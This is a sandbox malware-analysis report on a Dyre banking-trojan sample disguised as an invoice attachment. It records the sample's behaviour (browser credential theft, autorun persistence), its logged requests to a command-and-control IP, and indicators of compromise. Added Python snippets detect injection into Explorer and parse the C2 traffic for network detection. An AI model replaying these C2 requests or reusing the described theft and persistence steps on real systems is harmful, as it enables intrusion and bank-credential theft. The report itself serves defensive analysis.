
Tags: Dyre Dyreza

Analysis

Category Started Completed Duration
FILE 2014-06-11 05:06:44 2014-06-11 05:09:03 139 seconds

File Details

File Name Invoice_00739287.zip
File Size 162486 bytes
File Type Zip archive data, at least v2.0 to extract
MD5 dda44f23e9650fe42dd5cf9893a434a2
SHA1 88a4ad78db87d0f62cc4ca7b6ba24bd194fa943b
SHA256 417c9cd7c8abbd7bbddfc313c9f153758fd11bda47f754b9c59bc308d808c486
SHA512 b6a0a9db2c147e2b05b02251d9125f90b40febd6a0a00906769b2bc10ba42111731bcd6abf7a02e92bfb6821910e03b00e9e45ebe14af64a340945d3166b2866
CRC32 DCADC4D6
Ssdeep 3072:u6WDAD7hhNAfyjfjCTdAzQ+AWCG6b2NIEg3UcKFwyEsX9Kk3wZ:yq7/NAfyDj4m0WObVYP9KkAZ
Yara None matched

Signatures

File has been identified by at least one AntiVirus on VirusTotal as malicious
Performs some HTTP requests
Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate)
Steals private information from local Internet browsers
    process_id: 1412
    process_name: Explorer.EXE
    file: C:\Documents and Settings\User\Local Settings\Application Data\Google\Chrome\User Data\Local State
Installs itself for autorun at Windows startup

Hosts

IP
217.12.207.151
192.99.6.61
23.253.218.205

Domains

Domain IP
icanhazip.com 23.253.218.205

Summary

Files

C:\WINDOWS\Invoice_00739287.INI
C:\WINDOWS\system32\msctfime.ime
C:\WINDOWS\googleupdaterr.INI
C:\DOCUME~1\User\LOCALS~1\Temp\Invoice_00739287.scr
PIPE\lsarpc
C:\Documents and Settings\User\Application Data\userdata.dat
C:\Documents and Settings\User\Cookies\*.txt
C:\Documents and Settings\User\Cookies\Low\*.txt
C:\Documents and Settings\User\Local Settings\Application Data\Google\Chrome\User Data\Local State
C:\Documents and Settings\User\Application Data\Mozilla\Firefox\profiles.ini
C:\Documents and Settings\User\Application Data\Mozilla\Firefox\Profiles\vglnv7s6.default\cookies.sqlite
C:\Documents and Settings\All Users\Application Data\Microsoft\Network\Connections\Pbk\*.pbk
C:\WINDOWS\system32\Ras\*.pbk
c:\autoexec.bat
C:\Documents and Settings
C:\Documents and Settings\User\Local Settings
C:\Documents and Settings\User\Application Data\Microsoft\Network\Connections\Pbk\*.pbk
C:\

Registry Keys

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\IMM
HKEY_USERS\S-1-5-21-1547161642-507921405-839522115-1004\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers
HKEY_CURRENT_USER\SOFTWARE\Microsoft\CTF
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\SystemShared
HKEY_USERS\S-1-5-21-1547161642-507921405-839522115-1004
HKEY_USERS\S-1-5-21-1547161642-507921405-839522115-1004\Control Panel\Desktop
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\FontSubstitutes
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_USERS\S-1-5-21-1547161642-507921405-839522115-1004\SOFTWARE\Microsoft\Cryptography\Providers\Type 001
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Defaults\Provider\Microsoft Strong Cryptographic Provider
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\Offload
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_AUTOPROXY_CACHE_ANAME_KB921400
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_TEMPORARYFILES_FOR_NOCACHE_840387
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_TEMPORARYFILES_FOR_NOCACHE_840386
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\RETRY_HEADERONLYPOST_ONCONNECTIONRESET
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CHUNK_TIMEOUT_KB914453
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CERT_TRUST_VERIFIED_KB936882
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BUFFERBREAKING_818408
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SKIP_POST_RETRY_ON_INTERNETWRITEFILE_KB895954
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENSURE_FQDN_FOR_NEGOTIATE_KB899417
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_HTTP_DISABLE_NTLM_PREAUTH_IF_ABORTED_KB902409
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PERMIT_CACHE_FOR_AUTHENTICATED_FTP_KB910274
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WPAD_STORE_URL_AS_FQDN_KB903926
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_CNAME_FOR_SPN_KB911149
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_KEEP_CACHE_INDEX_OPEN_KB899342
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WAIT_TIME_THREAD_TERMINATE_KB886801
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_FIX_CHUNKED_PROXY_SCRIPT_DOWNLOAD_KB843289
HKEY_LOCAL_MACHINE\Software\Microsoft\Tracing\RASAPI32
HKEY_USERS\S-1-5-21-1547161642-507921405-839522115-1004\Software\Microsoft\windows\CurrentVersion\Internet Settings
HKEY_USERS\S-1-5-21-1547161642-507921405-839522115-1004\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\ComputerName\ActiveComputerName
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion
HKEY_USERS\S-1-5-21-1547161642-507921405-839522115-1004\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
HKEY_USERS\S-1-5-21-1547161642-507921405-839522115-1004\Environment
HKEY_USERS\S-1-5-21-1547161642-507921405-839522115-1004\Volatile Environment
HKEY_USERS\S-1-5-21-1547161642-507921405-839522115-1004\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
HKEY_USERS\S-1-5-21-1547161642-507921405-839522115-1004\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections
HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings

Mutexes

CTF.TimListCache.FMPDefaultS-1-5-21-1547161642-507921405-839522115-1004MUTEX.DefaultS-1-5-21-1547161642-507921405-839522115-1004
ShimCacheMutex
RangisMutex5
WininetStartupMutex
WininetConnectionMutex
WininetProxyRegistryMutex
Static Analysis

OOPS! No static analysis available, probably it's not a supported file format.

Strings (Invoice_00739287.scr)
.,*3C+
omDW%-|
6:_+|
y&}lm~
:FKCzK}
<[5_Jo
902DMz
~`L"<]Q
O `x>W
IfUH_E
7yE6[*
[9n:h{"
0W-G'u
=F6K_-
Yb)y=9?P
4Yq<Pk6:Z?
]Y1B\P
TGigz%
e|_/EV
3O.BOjC
InuGS*
3&vlZ4
^$Zg3A)
UeU_|a
viKxqE
xK!m8
`qwo_o
U:<4@7
qDqQWD
'CHay
+VE[61
Xy/T8\
]{fGy1
.WxNCz
Y1Bp~!8
sFY5iB
nbhj)}
F?<xskE
%u]&Z'
qias,c
GeR/PSBw
mfU,9|e
h~>r|M
n/L2n%
~T" i+
~^Gl"c
a`qw?n
L>hNQo&
R<yWQ
00:6LXx
G9H.^=[
5cgdG3
],AB~({
&*KeGz=t
;`?A/lf
hz]wjMf
<Sz(9h
XGuMpC
{K1bG/-
m1: `n
C'ZRqs
mCOR+bY
005Vmg
aH+qeh
|'u.t.
)-,!McZ
F-%t#a
B(+`MV
F68O&~
o)<V;3
Righ1(
@wQEx<T
>Z``Zq
D1]Iv
XTmnZH:
\=OZl+Y
@Ak{L*
61GAP^u
o}nL{(
42th(jee
w)L]9.
eMWgs*
eG'^l6
hxl1y>O
p!4N\i
Fd(&i;
v&-hPy
u>th-,
id=xo8
8U+BMbH
{igoNF=
Gi%uyz
<`?_\dY
v"Qo`:u
[[I_tB`IO
oy&y1<j
p}%hac
{79.f5
o9N,g
Cfh_%q
40kt`r
PMD{;[
p8RJP0
/uGkD=
SP9XZn|
q]I)jF
.:5y:8
~ER|-e
m\"eKR
=1=6gD
P+%=Vx
0Mo!x0v
Ut8@CNa
crK\(Fy
V\BG9=G?
D!b<ot
ddr=;3
d>s+x$
fnM\*c
)L?g92"
^(T!@0
{+*Rc|
Y5y,jQ
vE}..A
e}x>(g7S
G!t%.z
PH7Vh2
u~Z4B%
[1SRwD
h?s?D%
6L'$=[
#R'KAN
)[Q:E/Pz
#}\Sx|\{YC
=\jAeU
qSY2qL
!K/|HA
:2~cl[+,
{j|dhNe
WoU M(
$#rf|<
PekdK4
J^JBkc
+fbke_{
$YwZSY
^A>,B7#
oEXA=,K
/w>!?D
Cm5PP
$bWgtc
*SAitVja
.Ep5y+d
a;E__gJ%
UUB.7JJ
wd>p:mT:
8?$)6jc
:MGD"N
hVk;X#
:+N4zjy
id7[_8
n8[Q2hU
jVslH^}
YZS?a%q
NB9~uD#
t5>r8
a2Mc)c
C >;pf=I
eB7ukhr
0P)cIv
JmZ}'@pq
-s_|?3
MHwEUW
JO]H<
'Safo.
ro%h<7
W^M0[Gj;_
hCoipU
[m:\yi
F`oB:5M
PF|tZS
1SLW,k
s*q5+CF#
T3-KZ*
'-,GxH
&=>E`3
5m/,>c
mq<L1n
payl58
k*T}R!
t}i6%VQ
/A5><!
(`r )G
V~(~/{
Bb*a|+
&qdA{X
k\q"::
U5c"B\g
}mh9;!
Q-b>]d{
G[Lm$G
:1gQJ^
'2s$Y,
}[<CA1,
8c_"4n
pssP]D
"6m-JK
c12m3~
s/h!h<D
(Yhc7a
lUlK.W?y\
H%Wa^V
`>ke4Z_d
Z[b$mBt
@+l;4y,
7<NZSn
8{YT8T
G5+,/m
F7un2n
5'H`Ms-
Vs_Iq3pt
aQ_K9W
~gfwY`aWd
A_q'eU
?dUM<O d
EbguBb
p#2T]t
3hlm-_
Fo+U2';
lf[l$b
b}8J?c
%^h#o7G
iW>42R
sjXkWQl
Txe3tR
-?vp]Sq
4>4|P|$
G'm|}
B~L6(1
kEw65_~
#c}o=:
h(0*uH
D9I,7=
K^a1"
lf4*1=
%k'we3b
Fs[iJs
%5FurI
TpK'Nofqr
D0xdN,
)?Nw]@Q
VOW#XN?
]u@eu7
aom4b
>U-v<f*
%0+=iFZ
8Alq8W
I&`82i
8U$Qq$
R#Hd0q
hWmk0/G6
1h2qZ,
\}imM{
<Yb#y?
0~6V'1
HKUuz0
Xaa!VVV
Z[ObmmmX{;
$0oW]j(
+X/K,J+
&EWQ
\%BaVU
$1V0I6"
R%m| W
seL@JLt
20]l5
r6KRj~
fvMC)]p
}9PvG8
_Y~G0Y
i@gG97
VirusTotal (Invoice_00739287.scr)

Antivirus Signature
Bkav Clean
MicroWorld-eScan Clean
nProtect Clean
CMC Clean
CAT-QuickHeal Clean
McAfee Clean
Malwarebytes Clean
VIPRE Clean
SUPERAntiSpyware Clean
K7AntiVirus Trojan ( 7000000c1 )
K7GW Trojan ( 7000000c1 )
TheHacker Clean
NANO-Antivirus Clean
F-Prot Clean
Symantec Clean
Norman Clean
TotalDefense Clean
TrendMicro-HouseCall Clean
Avast Clean
ClamAV Clean
Kaspersky Clean
BitDefender Clean
Agnitum Clean
AegisLab Clean
ByteHero Clean
Tencent Clean
Ad-Aware Clean
Sophos Troj/Invo-Zip
Comodo Clean
F-Secure Clean
DrWeb Clean
Zillya Clean
AntiVir Clean
TrendMicro Clean
McAfee-GW-Edition Clean
Emsisoft Clean
Jiangmin Clean
Antiy-AVL Clean
Kingsoft Clean
Microsoft Clean
ViRobot Clean
GData Clean
Commtouch Clean
AhnLab-V3 Clean
VBA32 Clean
Baidu-International Clean
Zoner Clean
ESET-NOD32 Clean
Rising PE:Malware.XPACK-HIE/Heur!1.9C48
Ikarus Clean
Fortinet Clean
AVG Clean
Panda Clean
Qihoo-360 Malware.QVM07.Gen

Process Tree

  • Invoice_00739287.scr 1224
    • googleupdaterr.exe 1168
  • Explorer.EXE 1412

Invoice_00739287.scr, PID: 1224, Parent PID: 1276
googleupdaterr.exe, PID: 1168, Parent PID: 1224
Explorer.EXE, PID: 1412, Parent PID: 1380
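Reading the tree above together with the "Steals private information" signature: the process that opened Chrome's Local State file is Explorer.EXE (PID 1412), whose parent is 1380, not the sample (1224) or its child googleupdaterr.exe (1168). A process outside the sample's spawn tree doing the sample's work is the footprint of code injection into Explorer. The snippet below, an added example that is not part of the original report, automates that check over the PIDs and parent PIDs listed here; the file-read attribution for PID 1168 is assumed for contrast and does not come from the report.

```python
from typing import Dict, List, Set, Tuple

# Constructed from the process list above: pid -> (image name, parent pid).
# The layout is this example's own, not a Cuckoo export format.
PROCESSES: Dict[int, Tuple[str, int]] = {
    1224: ("Invoice_00739287.scr", 1276),
    1168: ("googleupdaterr.exe", 1224),
    1412: ("Explorer.EXE", 1380),
}

# (pid, path) events. The first is the attribution the report makes in its
# browser-theft signature; the second is an assumed event added for contrast.
SENSITIVE_FILE_READS: List[Tuple[int, str]] = [
    (1412, r"C:\Documents and Settings\User\Local Settings\Application Data\Google\Chrome\User Data\Local State"),
    (1168, r"C:\Documents and Settings\User\Cookies\*.txt"),  # assumed, not from the report
]


def descendants(procs: Dict[int, Tuple[str, int]], root: int) -> Set[int]:
    """root plus every process transitively spawned by it (fixed-point walk,
    so the dict order does not matter)."""
    found = {root}
    changed = True
    while changed:
        changed = False
        for pid, (_, ppid) in procs.items():
            if ppid in found and pid not in found:
                found.add(pid)
                changed = True
    return found


def lineage(procs: Dict[int, Tuple[str, int]], pid: int) -> List[str]:
    """Image names from pid upward until an ancestor the report did not record."""
    chain = []
    while pid in procs:
        name, pid = procs[pid]
        chain.append(name)
    return chain


def injection_suspects(procs: Dict[int, Tuple[str, int]], sample_pid: int,
                       reads: List[Tuple[int, str]]) -> Dict[int, List[str]]:
    """Processes outside the sample's spawn tree that touched sensitive files.

    In a sandbox run only the sample and its children should be reading
    browser credential stores; any other process doing so is either a live
    injection target or a mis-attributed event worth checking by hand."""
    tree = descendants(procs, sample_pid)
    suspects: Dict[int, List[str]] = {}
    for pid, path in reads:
        if pid not in tree:
            suspects.setdefault(pid, []).append(path)
    return suspects


if __name__ == "__main__":
    for pid, paths in injection_suspects(PROCESSES, 1224, SENSITIVE_FILE_READS).items():
        print(f"{PROCESSES[pid][0]} (PID {pid}, lineage {lineage(PROCESSES, pid)}) read:")
        for p in paths:
            print("   ", p)
```

Run against the report's own numbers this prints only Explorer.EXE; googleupdaterr.exe is inside the sample's tree and is therefore expected to behave like the sample.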

HTTP Requests

URI Data
http://192.99.6.61/cho1017/W512600.A5B96ED431CB3676FDA80962AB8316BA/5/publickey/
GET /cho1017/W512600.A5B96ED431CB3676FDA80962AB8316BA/5/publickey/ HTTP/1.1
User-Agent: Wget/1.9
Host: 192.99.6.61

http://icanhazip.com/
GET / HTTP/1.1
Host: icanhazip.com

http://192.99.6.61/cho1017/W512600.A5B96ED431CB3676FDA80962AB8316BA/0/Win_XP_32bit/1001/
GET /cho1017/W512600.A5B96ED431CB3676FDA80962AB8316BA/0/Win_XP_32bit/1001/ HTTP/1.1
User-Agent: Wget/1.9
Host: 192.99.6.61

http://192.99.6.61/cho1017/W512600.A5B96ED431CB3676FDA80962AB8316BA/1/LeXqIraYMSXwIhSVoAPxEHMnIMwJmfc/
GET /cho1017/W512600.A5B96ED431CB3676FDA80962AB8316BA/1/LeXqIraYMSXwIhSVoAPxEHMnIMwJmfc/ HTTP/1.1
User-Agent: Wget/1.9
Host: 192.99.6.61

http://192.99.6.61/cho1017/W512600.A5B96ED431CB3676FDA80962AB8316BA/58/1/
GET /cho1017/W512600.A5B96ED431CB3676FDA80962AB8316BA/58/1/ HTTP/1.1
User-Agent: Wget/1.9
Host: 192.99.6.61

http://192.99.6.61/cho1017/W512600.A5B96ED431CB3676FDA80962AB8316BA/1/syiJyderChOFcGVcKOviWXMtmQxthdt/
GET /cho1017/W512600.A5B96ED431CB3676FDA80962AB8316BA/1/syiJyderChOFcGVcKOviWXMtmQxthdt/ HTTP/1.1
User-Agent: Wget/1.9
Host: 192.99.6.61

http://192.99.6.61/cho1017/W512600.A5B96ED431CB3676FDA80962AB8316BA/1/GNAuFRKLbmTAeuuylUmSwbchuJyeReO/
GET /cho1017/W512600.A5B96ED431CB3676FDA80962AB8316BA/1/GNAuFRKLbmTAeuuylUmSwbchuJyeReO/ HTTP/1.1
User-Agent: Wget/1.9
Host: 192.99.6.61

http://192.99.6.61/cho1017/W512600.A5B96ED431CB3676FDA80962AB8316BA/1/tMmbVlMMKfCFiPPmlvsoFBNKsVuqQhB/
GET /cho1017/W512600.A5B96ED431CB3676FDA80962AB8316BA/1/tMmbVlMMKfCFiPPmlvsoFBNKsVuqQhB/ HTTP/1.1
User-Agent: Wget/1.9
Host: 192.99.6.61
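Every request to 192.99.6.61 above shares one shape: /cho1017/W512600.A5B96ED431CB3676FDA80962AB8316BA/<number>/<argument>/, sent with a hard-coded "User-Agent: Wget/1.9", and the run opens with a GET to icanhazip.com to learn the victim's public address. A constant path prefix (a campaign tag, a host tag and 32 hex characters that stay fixed across the session) plus a downloader user agent coming from an interactive Windows XP machine is enough to build a network detection. The code below is an added example, not part of the original report: it parses raw HTTP request dumps in the form printed above and pulls out those fields. The field names (campaign, hosttag, botid, code) are this example's labels for the observed positions, not names from the malware; the input embeds the requests recorded here plus one made-up benign browser request for contrast.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed input: the requests logged in this sandbox run, reproduced as
# blank-line separated raw request blocks, plus one invented benign request.
SAMPLE_TRAFFIC = """\
GET /cho1017/W512600.A5B96ED431CB3676FDA80962AB8316BA/5/publickey/ HTTP/1.1
User-Agent: Wget/1.9
Host: 192.99.6.61

GET / HTTP/1.1
Host: icanhazip.com

GET /cho1017/W512600.A5B96ED431CB3676FDA80962AB8316BA/0/Win_XP_32bit/1001/ HTTP/1.1
User-Agent: Wget/1.9
Host: 192.99.6.61

GET /cho1017/W512600.A5B96ED431CB3676FDA80962AB8316BA/1/LeXqIraYMSXwIhSVoAPxEHMnIMwJmfc/ HTTP/1.1
User-Agent: Wget/1.9
Host: 192.99.6.61

GET /cho1017/W512600.A5B96ED431CB3676FDA80962AB8316BA/58/1/ HTTP/1.1
User-Agent: Wget/1.9
Host: 192.99.6.61

GET /index.html HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1)
Host: www.example.com
"""

# Shape observed above: /<campaign>/<hosttag>.<32 hex>/<numeric code>/<args...>/
C2_PATH = re.compile(
    r"^/(?P<campaign>[A-Za-z0-9]+)"
    r"/(?P<hosttag>[A-Za-z0-9_-]+)\.(?P<botid>[0-9A-Fa-f]{32})"
    r"/(?P<code>\d+)(?P<args>(?:/[^/]+)*)/?$"
)
EXTERNAL_IP_SERVICES = {"icanhazip.com"}  # extend with the lookup services you see


@dataclass
class Request:
    method: str
    path: str
    headers: Dict[str, str] = field(default_factory=dict)  # lower-cased names

    @property
    def host(self) -> str:
        return self.headers.get("host", "")

    @property
    def user_agent(self) -> str:
        return self.headers.get("user-agent", "")


def parse_requests(raw: str) -> List[Request]:
    """Split a text dump of requests (blank-line separated) into Request objects."""
    out: List[Request] = []
    for block in re.split(r"\n\s*\n", raw.strip()):
        lines = [l for l in block.splitlines() if l.strip()]
        parts = lines[0].split() if lines else []
        if len(parts) < 2:
            continue  # not a request line
        headers = {}
        for line in lines[1:]:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        out.append(Request(parts[0], parts[1], headers))
    return out


def parse_c2_path(path: str) -> Optional[Dict[str, object]]:
    """Break a path of the observed shape into its fields, or None if it differs."""
    m = C2_PATH.match(path)
    if not m:
        return None
    return {
        "campaign": m.group("campaign"),
        "hosttag": m.group("hosttag"),
        "botid": m.group("botid").upper(),
        "code": int(m.group("code")),
        "args": [a for a in m.group("args").split("/") if a],
    }


def flag_request(req: Request) -> List[str]:
    """Cheap per-request indicators; any non-empty result is worth a look."""
    flags = []
    if req.user_agent.startswith("Wget/"):
        flags.append("wget-user-agent")      # command-line UA from a desktop host
    if req.host in EXTERNAL_IP_SERVICES:
        flags.append("external-ip-lookup")  # bot learning its public address
    if re.fullmatch(r"\d{1,3}(\.\d{1,3}){3}", req.host):
        flags.append("bare-ip-host")        # no domain, C2 addressed by IP
    if parse_c2_path(req.path):
        flags.append("dyre-style-c2-path")
    return flags


def summarise(raw: str) -> Dict[str, object]:
    """Identity carried in the URIs plus how many requests tripped a flag."""
    reqs = parse_requests(raw)
    c2 = [p for p in (parse_c2_path(r.path) for r in reqs) if p]
    return {
        "requests": len(reqs),
        "flagged": sum(1 for r in reqs if flag_request(r)),
        "campaigns": sorted({p["campaign"] for p in c2}),
        "botids": sorted({p["botid"] for p in c2}),
        "codes": [p["code"] for p in c2],
        "c2_hosts": sorted({r.host for r in reqs if parse_c2_path(r.path)}),
    }


if __name__ == "__main__":
    print(summarise(SAMPLE_TRAFFIC))
```

The regex keys on structure rather than on the literal values, so the same parser groups sessions by campaign tag and bot identifier across many captures; the individual numeric codes (5/publickey, 0/Win_XP_32bit/1001, 1/<token>, 58/1) are recorded as-is because this report does not explain them.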

IRC Traffic

No IRC traffic.

SMTP Requests

No SMTP requests performed.

Dropped Files

File name Invoice_00739287.scr
File Size 246784 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 c2d73485095efdbd7ab625e469affb11
SHA1 a0a7b943b46979cc593474b94f14f2451b8ac3c0
SHA256 523b9e8057ef0905e2c7d51b742d4be9374cf2eee5a810f05d987604847c549d
CRC32 02228702
Ssdeep 6144:/GpBEWJvXcs5eyOfevIUdy/ZV6u2nf0+8aq:/GkEEJy3IUdy/ZVrifqaq
Yara None matched

File name userdata.dat
File Size 338 bytes
File Type Hitachi SH big-endian COFF object, not stripped
MD5 1ead2fca645ca0d5bb95b81fcc019ae0
SHA1 4d7594e65617d71eea8c2ae97bb0e635015fa768
SHA256 73e2469f5c4cf5400afb55f67570c09b65bc8f2896eff17988dd3501166d2709
CRC32 AB6E1778
Ssdeep 6:fpAQaLwe/MLF/eG6adqOdE08H6YmdL041GmvLj1kPxf4eC7gkyrdhum0NJ:veSlldE08HzY3DjuTC7g/dUm0L
Yara None matched
Analysis : http://phishme.com/project-dyre-new-rat-slurps-bank-credentials-bypasses-ssl/ – ansoc on July 2, 2014, 6:50 a.m.
